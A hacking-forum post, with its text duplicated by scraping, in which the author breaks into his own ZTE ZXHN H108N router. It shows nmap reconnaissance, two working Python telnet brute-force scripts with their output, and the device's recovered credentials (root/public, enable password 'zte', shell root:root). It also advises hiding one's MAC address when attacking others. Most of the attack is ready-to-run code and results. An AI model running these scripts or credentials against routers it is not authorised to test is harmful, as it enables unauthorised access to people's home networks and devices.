Hacking ZTE router (ZXHN H108N) 06-24-2014, 11:24 PM
#1
Hello
I did this for fun only... nothing really special, this is just a story (a true one)
Setup
OK, I have a ZTE router: ZXHN H108N, that is I am connected to using wlan0 interface (wireless), and the gateway is 192.168.1.1, the goal is to gain access to the shell!
I am (recently only) running Mint 16, not Kali, not BT5 and of course not Mickey Mouse (Windows)!
Reconnaissance and Footprinting
Note: as this is my router I didn't have to worry about hidding (going anonemous) by changing MAC address and so on... but I would recommend doing so if you are pentesting/hacking someone!
So first thing to do is to scan the ports and OS banner (to determine the OS) and so on! For that I used nmap:
I used a fast scan (-F option) for no reason really, I could do a full TCP scan or even include UDP... but I would like to keep things ... simple!
So as you can see the OS is Linux 2.6.9-30 and there are three ports opened... and holy crap this router is running Telnet!!! This should be fun (and it was!)
Gaining Access
So the next thing is to try and connect to the router via Telnet, so I did the following:
Hmmm... I need the user name and password to access the CLI (Command Line Interface)! Well... tbh I just tried couple of random usernames (I had 3 chanced before the connection is lost), the first one was "admin" and it returned "% Bad username!" but then I thought to myself: "If I want to access the shell as root... the username should be root right? duh!!!", so entered "root" and it was correct, but for the password I tried couple of known passwords such as {toor, root, admin, admin123, ...} none worked (I failed)! I could go on for hours/days/weeks... but I want to access the shell and I wanted NOW!!!
The Attack 0x00
So, what do I have so far?
I need the password!
Well... for no reason I decided to write my own tool to crack the password, using dictionay attack, I was lucky! because I used a very small wordlist (1275 words only), the wordlist (or dictionary) is made of the most common used passwords, I don't remember where I got this list from, but it is not important really!
My code:
Note: the script is dirty, and I don't care, all I want is the password! If you are irritated by my script please feel free to post a better one, but please do it quietly please, the script is not the main topic for this thread! Or for any of my threads... ever! I am asking this with all my respect of course.
So here is the output (took a while to finish):
Bingo! The password is "public", time to test:
Explanation:
The Attack 0x01
And now I need the password to enable the config mode, I tested some passwords manually, and I guessed it successfully after few attempts, BUT... let's try brute-force the damn thing
The password is alphanumeric, so my charset will be:
So I need a code to test the combination of all these letters ... crazy eh? becaue the total tries for only three characters password would be:
And for 8 characters:
I have no time for this ... so I will show you a simple script (just for fun), that will check only 3 characters long passwords (and only with string.lowercase charset)
Output (took +4 hours to finish)
Yes it was 'zte', something I did guess by myself, and with this information I could actually access the config mode:
I don't want to make this thread any longer, I know that the subject is boring, but... I had to share (for a very good reason)
So the username and the password for the shell is root:root (easy eh?)
Conclusion
If your router is using Telnet... get another one! If it does use SSH check the version and security! Be very careful with these issues, a misconfigured network device can be the worse nightmare one can have if a hacker find out about it! So always check and double check your network configuration and devies you use!
Thank you and please leave your comment[s] or question[s]
[note] If you are interested in this topic please check my other thread: http://www.hackcommunity.com/Thread-Haki...-TL-WR740N
I did this for fun only... nothing really special, this is just a story (a true one)
Setup
OK, I have a ZTE router: ZXHN H108N, that is I am connected to using wlan0 interface (wireless), and the gateway is 192.168.1.1, the goal is to gain access to the shell!
I am (recently only) running Mint 16, not Kali, not BT5 and of course not Mickey Mouse (Windows)!
Reconnaissance and Footprinting
Note: as this is my router I didn't have to worry about hidding (going anonemous) by changing MAC address and so on... but I would recommend doing so if you are pentesting/hacking someone!
So first thing to do is to scan the ports and OS banner (to determine the OS) and so on! For that I used nmap:
Code:
nmap -F 192.168.1.1 -O
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-20 00:03 EEST
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.0035s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
443/tcp open https
MAC Address: 54:22:F8:16:67:1F (zte)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.32 secondsI used a fast scan (-F option) for no reason really, I could do a full TCP scan or even include UDP... but I would like to keep things ... simple!
So as you can see the OS is Linux 2.6.9-30 and there are three ports opened... and holy crap this router is running Telnet!!! This should be fun (and it was!)
Gaining Access
So the next thing is to try and connect to the router via Telnet, so I did the following:
Code:
ligeti-Studio-1558 ~ # telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
************************************************************
Welcome to the world of CLI !
************************************************************
Username:Hmmm... I need the user name and password to access the CLI (Command Line Interface)! Well... tbh I just tried couple of random usernames (I had 3 chanced before the connection is lost), the first one was "admin" and it returned "% Bad username!" but then I thought to myself: "If I want to access the shell as root... the username should be root right? duh!!!", so entered "root" and it was correct, but for the password I tried couple of known passwords such as {toor, root, admin, admin123, ...} none worked (I failed)! I could go on for hours/days/weeks... but I want to access the shell and I wanted NOW!!!
The Attack 0x00
So, what do I have so far?
- IP address
- Telnet access (opened)
- CLI
- Username
I need the password!
Well... for no reason I decided to write my own tool to crack the password, using dictionay attack, I was lucky! because I used a very small wordlist (1275 words only), the wordlist (or dictionary) is made of the most common used passwords, I don't remember where I got this list from, but it is not important really!
My code:
Code:
#ZTE_Hacking
# execfile('/home/ligeti/Scripts/ZTE_Script.py')
import telnetlib
import time
from sys import stdout
wordlist = '/home/ligeti/wordlists/wordlist.txt'
# Load the wordlist file
with open(wordlist, 'r+') as f:
# Read the file
lines = f.readlines()
# Telnet
connection = telnetlib.Telnet()
# Testing
for password in lines:
try:
print '\r' + '\t' + time.ctime(time.time()) + '\t' + password.strip('\r\n'),
stdout.flush()
# Connect to the router (Telnet)
connection.open('192.168.1.1')
# Read until the server/Router asks for username
chk = connection.read_until("Username:")
# Send the username (root)
connection.write("root\n")
# Read until the server/Router asks for password!
chk = connection.read_until('Password:')
#send the password that we are currently testing
connection.write(password)
# this is important, I actually don't know
# how to check if this password is correct
# but I know that it will keep asking for the password in case if it is not!
# So I will check for the "Password:" string and if I get a delay
# for 1 second then this could mean that this is the correct password!
chk = connection.read_until('Password:', 5)
# Extra check: checking that the router didn't respond with "% Bad username!"
if ('Bad' not in chk):
connection.close()
print "\nHacked: " + password
break
connection.close()
except Exception, e:
print 'Error (' + password.strip('\r\n') + '): ' + str(e)Note: the script is dirty, and I don't care, all I want is the password! If you are irritated by my script please feel free to post a better one, but please do it quietly please, the script is not the main topic for this thread! Or for any of my threads... ever! I am asking this with all my respect of course.
So here is the output (took a while to finish):
Code:
>>> execfile('/home/ligeti/Scripts/ZTE_Script.py')
Tue Jun 24 23:17:13 2014 888888 Error (888888): telnet connection closed
Tue Jun 24 23:17:46 2014 angela1 Error (angela1): telnet connection closed
.
.
.
Tue Jun 24 23:31:46 2014 parrot Error (parrot): telnet connection closed
Tue Jun 24 23:32:10 2014 public
Hacked: publicBingo! The password is "public", time to test:
Code:
ligeti-Studio-1558 ~ # telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
************************************************************
Welcome to the world of CLI !
************************************************************
Username:root
Password:
CLI>?
Exec commands:
enable Turn on privileged commands.
exit Quit from telnet.
ping Ping the destination.
CLI>enable
Password:Explanation:
- I connect to 192.168.1.1:23 (telnet).
- I enter the user name and password (root/public).
- I see CLI> prompt (similar to Cisco routers) so I try '?' for help.
- I see enable command, which switch the CLI to config mode.
The Attack 0x01
And now I need the password to enable the config mode, I tested some passwords manually, and I guessed it successfully after few attempts, BUT... let's try brute-force the damn thing
The password is alphanumeric, so my charset will be:
Code:
>>> string.ascii_letters + string.digits
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'So I need a code to test the combination of all these letters ... crazy eh? becaue the total tries for only three characters password would be:
Code:
>>> pow(len(string.ascii_letters + string.digits), 3)
238328And for 8 characters:
Code:
>>> pow(len(string.ascii_letters + string.digits), 8)
218340105584896LI have no time for this ... so I will show you a simple script (just for fun), that will check only 3 characters long passwords (and only with string.lowercase charset)
Code:
#ZTE_Enable
# execfile('/home/ligeti/Scripts/ZTE_Enable.py')
import telnetlib
import time
from sys import stdout
import itertools
import string
password = []
connection = telnetlib.Telnet()
print "Connecting to router"
connection.open('192.168.1.1')
print "Connecting to CLI"
chk = connection.read_until('Username:')
connection.write('root\n')
chk = connection.read_until('Password:')
connection.write('public\n')
chk = connection.read_until('CLI>')
print "Generating wordlist"
wordlist = itertools.product(string.lowercase, repeat=3)
for word in wordlist:
password.append(''.join(word))
print "Attacking..."
index = 0
while (index < len(password)):
connection.write('enable\n')
chk = connection.read_until('Password:')
for i in range(0, 3):
print '\r' + str(index) + '\t' + time.ctime(time.time()) + '\t' + password[index],
stdout.flush()
connection.write(password[index] + '\n')
chk = connection.read_until('Password:', 1)
index += 1
if ('Bad' not in chk):
print "\nHacked: " + password[index-1]
breakOutput (took +4 hours to finish)
Code:
>>> execfile('/home/ligeti/Scripts/ZTE_Enable.py')
Connecting to router
Connecting to CLI
Generating wordlist
Attacking...
17398 Wed Jun 25 00:59:00 2014 zte
Hacked: zteYes it was 'zte', something I did guess by myself, and with this information I could actually access the config mode:
Code:
CLI>enable
Password:
CLI#?
Exec commands:
allgreenledon set all green led on
allledoff set all led off
allledon set all led on
configure Enter configuration mode.
disable Exit from privilege mode.
exit Quit from telnet.
macaddr show or set mac address
ping Ping the destination.
reboot Reboot device.
reset reset device
restoredefault Reset to factory configuration.
serialnumber get or set SN
swversion show software version
CLI#shell
ZXHN H108N
Login: root
Password:
Password is incorrect
Password:
Password is incorrect
Password:
BusyBox v1.01 (2013.07.10-08:47+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
#I don't want to make this thread any longer, I know that the subject is boring, but... I had to share (for a very good reason)
So the username and the password for the shell is root:root (easy eh?)
Conclusion
If your router is using Telnet... get another one! If it does use SSH check the version and security! Be very careful with these issues, a misconfigured network device can be the worse nightmare one can have if a hacker find out about it! So always check and double check your network configuration and devies you use!
Thank you and please leave your comment[s] or question[s]
[note] If you are interested in this topic please check my other thread: http://www.hackcommunity.com/Thread-Haki...-TL-WR740N
![[Image: wvBFmA5.png]](http://i.imgur.com/wvBFmA5.png)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)